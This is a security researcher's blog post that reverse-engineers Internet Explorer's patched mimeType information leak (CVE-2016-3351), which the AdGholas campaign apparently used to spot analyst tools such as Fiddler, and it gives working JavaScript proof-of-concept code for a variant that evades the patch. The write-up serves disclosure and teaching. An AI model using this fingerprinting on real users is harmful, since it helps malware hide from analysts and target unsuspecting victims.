Detecting analysts before installing the malware (IE)

With the help of a beautiful piece of code, malware authors can detect installed applications straight from within the browser and serve the bad bits only to unsavvy users. In other words, attackers target regular users by detecting specific analysts applications (like Fiddler) and serving their harmful program to users that do not have those apps installed. Essentially, their goal is to keep their malware under the radars for a longer period of time.

Today we are going find a variation for CVE-2016-3351 that Microsoft patched last Tuesday, but before getting started, let me tell you that I couldn’t even begin this without the continued help of Jérôme Segura from MalwareBytes. Also, later on the issue I received help from Kafeine, Brooks Li, and Joseph C Chen either directly or out of their impressive research on AdGholas. Finally, I’d like to thank Eric Lawrence and David Ross because without their constant help and support, blogging for me wouldn’t be possible.

Until last week, I have no idea of the details on the technique that follows. I knew like everyone else that AdGholas was evading analysts but I had no idea how, and no free time to research about it. However, I was still curious but Brooks Li gently told me that he couldn’t share the PoC until Microsoft released the patch. So, I simply forgot about this until last Tuesday, when I saw that my PC was updating. Ohh!! The mimeType bug! So I requested the PoC from Brooks and he told me that they have published the solution, right here. The article was impressive, but what caught my attention was the image below (yellow is mine).

Elegant Code

This is beautiful! How simple and elegant! Let’s convert it into something easier for our eyes:

anchor = document.createElement("A");
anchor.href = ".saz";
alert(anchor.mimeType);
// returns Fiddler Session Archive

Fiddler Archive

Impressive! This returns Fiddler Session Archive, so attackers will quickly know if the user has Fiddler installed! Of course this can be done with other extensions and if you are curious, open the registry and navigate to Computer\HKEY_CLASSES_ROOT. There they are.

I was really amazed by the simplicity of the code, extremely beautiful even being malware, so I created a simple function based on it for easier testing. Of course that beauty will stop working after updating our Windows, but who will deny its elegance anyway? Five minutes later my PC was updated and I was excited to see the same code failing after the patch. Predictably, it failed. It now returns “undefined” when we retrieve mimeType property of an anchor element.

Just as a quick preview of what’s coming, take a look at the before and after patch pictures. If it were the ad of a weight loss product we would be impressed by the change: the code has really been reduced! We don’t need to analyze anything at this point, just watch how the code was brutally trimmed. I prefer the elegance of the malware authors, even if malware. And by the way, attackers won’t get discouraged by this trim, they will instead try to find an alternative.

Bug patched: Finding an Alternative

So the patch is brutal but ideas start flowing. Why don’t we find an alternative route (aka variation) like real attackers do? It might be possible and worth a few minutes. So we need to get the unpatched code (from mshtml.dll in this case) and find what’s the binary function that gets hit when we access the anchor mimeType. Then, we need to find a way to call that same code using a different path.

The flow below shows what we guess before even disassembling mshtml. We know for sure that the yellow path exists, but we want to know if there are alternatives (red) to it. How can we do that? First, we should find the exact binary code that retrieves the mimeType, and then, uncover other references to it. The red path is a speculation, something that could or could not be there. But we will give it a try and get the answer pretty quick.

There is a path from the JavaScript anchor.mimeType to a binary function (compiled code) that retrieves the mimeType. Our goal is to find the binary code that retrieves the mimeType and uncover every reference to it. The red paths show references that we suspect might exist, and even if this is just a guess, it’s worth our time because it can be done in a couple of minutes.

Path to mimeType

We will be using IDA Free for this task but there are many tools to achieve the same thing. In fact, once we get familiar with IE/Edge function names, we will go faster with a live debugger like WinDBG or even a quick disassembler like Hiew (with symbols). But today we will assume that IE is a strange object for us and we don’t know anything about it.

Setup IDA Free

Note: I will be posting soon how to setup IDA Free with public symbols so you can do exactly as we do here. But in the meantime I pasted plain-text instructions here so you can get started!

Finding the Interesting Code

Let’s drop in IDA the binary that makes Internet Explorer tick: mshtml.dll. If you are not familiar with disassemblers, just follow as much as you can. This will be pretty basic and we can safely forget about opcodes today. Ready for the adventure? Remember: no Assembler required, just a bit of mind-stretching on ourselves.
First Goal: find the binary code that reveals the mimeType information.

We know that in JavaScript, anchor.mimeType retrieves the information that we want, so let’s go straight to the Strings Tab in IDA and search for “mimeType”. We want to see what’s the code that references it. The first two matches clearly have nothing to do with our goal: MSMimeTypesCollections, MSMimeTypesCollectionsPrototype. The third one is MimeType but we want one that starts with a lowercase m. The next two are MimeTypeArray are MimeTypeArrayPrototype which again are not what we need. Next one seems to be what we are searching for! This is the first real match of “mimeType”.

mimeType String Found

Double clicking on that string takes us to the binary code tab (IDA-ViewA) which includes data references.

IDA Code View

IDA labels everything it can to help us with the analysis. In this case the “mimeType” string pointer was named aMimetype_2 as shown above (1). At the right (2) we can see the code that uses this string, but in order to see the complete list we should click on the label aMimeType_2 and press the “X” so a popUp will open with every line of code referencing this string. How convenient! (We know there are more references because of the three dots (3) at the right).

Now check out the popUp below. We have three references and the middle one seems to be the one that we need. Don’t you think so? We want to find first what’s the binary code that is hit when we access anchor.mimeType and the function names below, make sense to me.

IDA References popUp

Remember, we are not trying to read opcodes here, just flowing with things that make sense according to the names that we know. There are more orthodox ways to achieve this but we are investing less than five minutes, just an educated guess.

Take a look at the names below. To me, the first one makes sense CHTMLAnchorElement::Trampoline_Get_mimeType. True that the “Trampoline” part does not look familiar, but it does not prevent us to keep going and see if we find what we need.

Code Step 1

Entering there (double click) takes us to a longer piece of code, but we shouldn’t lose our target: mimeType. Don’t read opcodes, just find “mimeType”.

CloseToMimeType

Even if confusing at first sight, if we do as we said and ignore the opcodes, it’s obvious what’s the function that we should follow, right? And if we double click on CAnchorElement::get_mimeType, we will end up in the code below.

Real call to code

Again a bit longer than we would like, but we have CHyperlink_get_href first and a few lines below GetFileTypeInfo. It somewhat rings to me. First getting the href and then calling GetFileTypeInfo. I totally know this is a speculation but when we are analyzing regular code, educated guesses work most of the time. If we were reversing malware this would be harder, however, IE does not play tricks on us. Let’s go to GetFileTypeInfo and see what we have there.

GetFileTypeInfo

We found our code! The call to SHGetFileInfoW seems pretty obvious to me, but we can always Google it and see what it does. This seems to be the code that retrieves the mimeType, but remember we are speculating here. Let’s see if this 3 minute speculation gives us some dividends.

Finding References (to discover alternative paths)

Click once at the top, over “GetFileTypeInfo” and press the “X” to display all references. Remember: we want to see if there are other ways to hit this code.

References that hit the code

Trying JavaScript Code

Bingo! It seems that this code is hit twice by CDocument::get_mimeType, another one by CImgElement::get_mimeType and of course the one that we knew from the beginning, CAnchorElement::get_mimeType. CDocument looks like the document object to me and CImgElement seems to be the Image object or IMG HTML Tag. Of course we are speculating, but what do we lose by going right now to the browser and testing document.mimeType and Image.mimeType? I didn’t even know (or remember) that those properties existed.

Hitting the code using an Image

Rayos y centellas, Batman! It worked! Let’s see what happens with the document object. Will this work?

Hitting with document.mimeType

So now that we learned about these properties, we can complete the original flow, just like this:

We still don’t know if the anchorElement has other paths to the same code, but why bother? We are working with the unpatched binary and as we’ve seen at the beginning, the patched one has been seriously trimmed. In fact, a quick analysis reveals that anchorElement.mimeType and GetFileTypeInfo are not connected anymore. By “quick analysis” I mean pressing the “X” over the GetFileTypeInfo function inside IDA on the patched file. So, the updated flow really looks like this:

Playing with Code Alternatives

We know that the anchorElement is useless for our goal but the image and document objects have chances. Well, thinking for a moment, images can’t render things other than images, so it will be better to first try using the document object which is capable of rendering images, xml, html, and more. Also, if we are going to render different content-types in a document, better not to use the one where we run our script, right? If we do, our script will be unloaded by the new content. Let’s create an iframe and play with its document.

We try to render a .saz (Fiddler) file right inside the iframe.

iframe = document.createElement("iframe");
iframe.src = "saz.saz";  // Load a saz file
document.body.appendChild(iframe);

Damn! IE tries to download the file and throws this warning!

IE Warning

Not acceptable. Attackers are very cautious with these things. They will get caught immediately with a code like that. And in any case, it does not work: when we try to get the document.mimeType of that iframe, it returns “Chrome HTML Document”. We need to change the URL of that iframe without warnings and fool IE to think that a saz file has been rendered. We will set the location of the iframe without really changing the content of the document. This can be done with history.pushState or history.replaceState. Let’s continue with the same iframe.

iframe.contentWindow.history.pushState("","","saz.saz");
alert(iframe.contentDocument.mimeType);

pushstatemimetype

It seems that we have it, right? Wrong! We’ve been lucky because the saz file was previously downloaded and cached, although not rendered because it has a saz extension. When IE requests data from a URL, it first tries to guess its content type using different mechanisms, and the last of them is the file extension. In this case we are not even retrieving a valid saz file, the web-server response was a default HTTP Status Code 200 with default Content-Type: application/octet-stream but IE ended up guessing that it’s a Fiddler file because of its extension, however, it needed to download the file first.

Building a working Proof of Concept

So what can we do to download the file in advance without warnings? Well, there are a zillion ways, but let’s use the most primitive one which was used in the past to cache roll-over images: the Image object. Let’s build a proof of concept but this time caching the saz in advance and using replaceState instead of pushState (it’s cleaner and doesn’t add URLs in the history object).

img = new Image();
img.src = "saz.saz"; // HTTP 200, any length and content-type

// The saz is precached. Let's create the iframe.
iframe = document.createElement("iframe");

// Load anything inside it because about:blank does not work with replaceState.
iframe.src = "/favicon.ico";
document.body.appendChild(iframe);

// Set the location of the iframe to the saz file
iframe.contentWindow.history.replaceState("", "", img.src);

// Bingo!
alert(iframe.contentDocument.mimeType);

Update: variation patched on 2016-11-08.

[ Test it Live on IE ] [ Download the Files ]

If you are a Linux user, just watch the video below:

Have a nice day, fellow bug hunter! If you have questions please ping me at magicmac2000.